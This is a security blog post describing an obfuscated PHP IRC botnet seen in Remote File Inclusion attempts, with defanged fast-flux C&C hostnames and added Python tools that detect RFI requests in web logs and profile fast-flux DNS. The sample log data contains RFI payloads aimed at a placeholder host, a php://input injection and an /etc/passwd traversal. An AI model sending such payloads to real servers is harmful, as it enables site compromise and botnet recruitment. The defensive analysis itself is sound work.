PHP-based IRC botnet, fast-flux of course
I was checking out the various RFI (Remote File Inclusion) exploits thrown at my site when I saw an exploit file that was heavily obfuscated. I meddled with the code a bit and got it to reveal the C&C servers:
ko .dd.blueline.be
mymusics .dnip.net
himan .opendns.be
myphone3 .dnip.net
xphon3 .opendns.be
p4n33123e .dd.blueline.be
mymusicband .weedns.com
myphonenumber .weedns.com
ieatironx .weedns.com
The domain names are broken on purpose. The servers run a modified IRC server at a non-standard IRC port. I also left out the server password and other data to prevent further exploitation.
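The RFI attempts mentioned above leave a recognisable trace in the web server's access log: a query parameter whose value is a URL (or a PHP stream wrapper) pointing somewhere else, usually with a trailing `?` so that whatever the vulnerable script appends ends up in the query string instead of the path. The following is an added example, not code from the original post, that pulls such requests out of Apache combined-format log lines. The log lines and addresses are constructed (RFC 5737 ranges), and the scheme list and the double-decoding are my own choices, not something the post describes.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache "combined" log format; not real traffic.
# Lines 1, 2 and 5 are RFI-shaped, line 4 is an LFI attempt (not flagged here),
# line 3 is an ordinary request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:03:14:07 +0100] "GET /index.php?page=http://198.51.100.23/bot.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [12/Mar/2008:03:14:09 +0100] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http%3A%2F%2F198.51.100.23%2Fid.txt%3F%3F HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
192.0.2.5 - - [12/Mar/2008:03:15:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 1042 "http://example.org/" "Mozilla/5.0"
192.0.2.5 - - [12/Mar/2008:03:15:02 +0100] "GET /include.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1042 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2008:03:16:10 +0100] "GET /admin/index.php?inc=php://input HTTP/1.1" 500 0 "-" "Mozilla/4.0"
"""

# Enough of the combined format to get the client IP, the request target and the status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Schemes and stream wrappers that PHP's include()/require() will open when
# allow_url_include (on old PHP, allow_url_fopen) is enabled. Assumed list.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def is_rfi_value(value):
    """True if a query parameter value looks like a remote include target."""
    # Decode twice: attackers double-encode to slip past naive filters.
    v = unquote(unquote(value)).lower().lstrip()
    return any(v.startswith(s) for s in REMOTE_SCHEMES)


def find_rfi_attempts(log_text):
    """Return one dict per (request, parameter) pair whose value is a remote include."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than crash
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if is_rfi_value(value):
                hits.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "url": unquote(unquote(value)),
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["param"]}={hit["url"]} -> {hit["status"]}')
```

The decoded `url` field is what you then fetch (from an isolated box) to obtain the obfuscated bot file itself. A 200 in the log does not prove the include succeeded, only that the target script exists; a 404 against a module you do not run is just the scanner working through its list.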
It’s not too common yet to see PHP-based botnets, but throwing in the heavy obfuscation of the code and the fast-fluxing of the C&Cs makes this one an interesting case.
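"Fast-flux" here means the C&C hostnames resolve to a changing set of addresses on short TTLs, so blocking the IP you saw five minutes ago buys nothing; the hostname is the stable handle. Below is an added example (not from the original post) of one way to profile that from repeated lookups. The observations are constructed with RFC 5737 addresses rather than the real C&C resolutions, the thresholds are my own assumptions, and /24 prefixes stand in for the ASN lookup you would do with real data.

```python
import ipaddress

# Constructed DNS answer observations: (seconds since start, qname, TTL, A records).
# Made-up RFC 5737 addresses, not the resolutions of the domains in the post.
# cnc.example.net rotates through many hosts on a short TTL; www.example.org does not.
OBSERVATIONS = [
    (0,    "cnc.example.net", 180,  ["198.51.100.17", "203.0.113.44", "192.0.2.99"]),
    (300,  "cnc.example.net", 180,  ["203.0.113.44", "198.51.100.201", "192.0.2.150"]),
    (600,  "cnc.example.net", 120,  ["192.0.2.150", "198.51.100.5", "203.0.113.77"]),
    (900,  "cnc.example.net", 180,  ["198.51.100.66", "192.0.2.8", "203.0.113.120"]),
    (0,    "www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
    (3600, "www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
    (7200, "www.example.org", 3600, ["192.0.2.11", "192.0.2.10"]),
]


def flux_profile(observations, qname):
    """Summarise how one name's A records behave across repeated lookups."""
    obs = sorted((o for o in observations if o[1] == qname), key=lambda o: o[0])
    answer_sets = [frozenset(o[3]) for o in obs]
    unique_ips = set().union(*answer_sets) if answer_sets else set()
    # /24 prefixes as a crude diversity measure; with real data map each IP to its ASN.
    networks = {
        str(ipaddress.ip_network(ip + "/24", strict=False)) for ip in unique_ips
    }
    # Churn: fraction of consecutive lookups whose answer set differs (order ignored).
    changes = sum(1 for a, b in zip(answer_sets, answer_sets[1:]) if a != b)
    churn = changes / (len(answer_sets) - 1) if len(answer_sets) > 1 else 0.0
    return {
        "lookups": len(obs),
        "unique_ips": len(unique_ips),
        "networks": len(networks),
        "min_ttl": min((o[2] for o in obs), default=None),
        "churn": churn,
    }


def looks_fast_flux(profile, max_ttl=300, min_ips=5, min_networks=3, min_churn=0.5):
    """Assumed thresholds: short TTL, many addresses across many networks, high churn.
    A CDN can trip the first two, so churn and network spread matter as much as TTL."""
    return (
        profile["min_ttl"] is not None
        and profile["min_ttl"] <= max_ttl
        and profile["unique_ips"] >= min_ips
        and profile["networks"] >= min_networks
        and profile["churn"] >= min_churn
    )


if __name__ == "__main__":
    for name in sorted({o[1] for o in OBSERVATIONS}):
        p = flux_profile(OBSERVATIONS, name)
        print(name, p, "fast-flux" if looks_fast_flux(p) else "stable")
```

To feed this with real data, query each name every few minutes for an hour or so (a plain `dig +noall +answer +ttlid` loop is enough), record the TTL and A records per lookup, and compare against a known-good name from the same resolver. A legitimate round-robin or CDN name will show low churn and a handful of networks; a flux network shows addresses that keep changing and that belong to residential ranges rather than hosting providers, which is exactly what makes blocking by IP pointless.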